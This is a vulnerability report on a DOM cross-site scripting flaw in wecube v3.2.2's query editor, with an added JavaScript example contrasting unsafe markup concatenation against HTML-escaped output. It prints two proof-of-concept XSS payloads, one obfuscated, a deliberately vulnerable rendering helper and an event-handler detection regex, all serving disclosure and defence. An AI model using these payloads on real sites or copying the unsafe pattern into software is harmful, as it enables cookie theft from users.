
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Open 0x30Rizk opened this issue 3 years ago • 0 comments

Describe the bug you encountered

DOM XSS exists in the database query statement, wecube v3.2.2

How to reproduce

Enter:

```
select < b onmouseover="window['ale'+'rt']('DOM XSS')">hello

select < b onmouseover='alert("XSS")'>hello
```

Notes: please remove the space after `<`.

Expected behavior

JavaScript is allowed to execute and can steal cookies.

Screenshots

(two screenshots, 01 and 02, not included in this extraction)

Additional context

0x30Rizk, Aug 05 '22 12:08
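The report above describes a query-editor value echoed into the DOM without encoding. The following is an added example, not wecube-platform's own code, showing the vulnerable concatenation pattern beside the hardened form that applies HTML entity encoding at the sink, plus a small regression check that the rendered markup no longer contains an element with an `on*` event-handler attribute. The `renderUnsafe`, `renderSafe`, `escapeHtml` and `containsEventHandlerTag` names and the `<pre class="sql">` wrapper are assumptions made for illustration; the sample input reuses the second payload shape from the report, with the space after `<` removed as the reporter's note instructs.

```javascript
// Added example (not wecube-platform code): neutralising untrusted text before
// it reaches an HTML sink such as innerHTML. The fix for CWE-79 in this shape
// is contextual output encoding at the sink, not input filtering.

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Encode a value for an HTML text node or a double/single-quoted attribute.
// All five characters are replaced in one pass, so '&' is never double-encoded.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern (hypothetical helper): the user-supplied query text is
// concatenated straight into markup that the caller would assign to innerHTML.
function renderUnsafe(queryText) {
  return `<pre class="sql">${queryText}</pre>`;
}

// Hardened pattern: identical markup, but the untrusted value is encoded at the
// point where it enters the HTML context. Using element.textContent instead of
// innerHTML achieves the same thing when a real DOM is available.
function renderSafe(queryText) {
  return `<pre class="sql">${escapeHtml(queryText)}</pre>`;
}

// Regression aid for a test suite: true if the markup still contains a tag
// start followed by an on* event-handler attribute. This is a detection
// heuristic for tests only, not a substitute for encoding.
function containsEventHandlerTag(markup) {
  return /<\w[^>]*\son\w+\s*=/i.test(markup);
}

// Constructed sample input: the payload shape from the report above, with the
// defanging space after '<' removed.
const SAMPLE_INPUT = 'select <b onmouseover=\'alert("XSS")\'>hello';

console.log('unsafe :', renderUnsafe(SAMPLE_INPUT));
console.log('safe   :', renderSafe(SAMPLE_INPUT));
console.log('handler present (unsafe):', containsEventHandlerTag(renderUnsafe(SAMPLE_INPUT)));
console.log('handler present (safe)  :', containsEventHandlerTag(renderSafe(SAMPLE_INPUT)));
```

Encoding has to match the context the value lands in: the table above covers HTML text and quoted attributes, but a value placed inside a `<script>` block, a URL, or an unquoted attribute needs a different encoder, which is why frameworks' default interpolation (which encodes) should be preferred over raw HTML sinks wherever the query editor renders results.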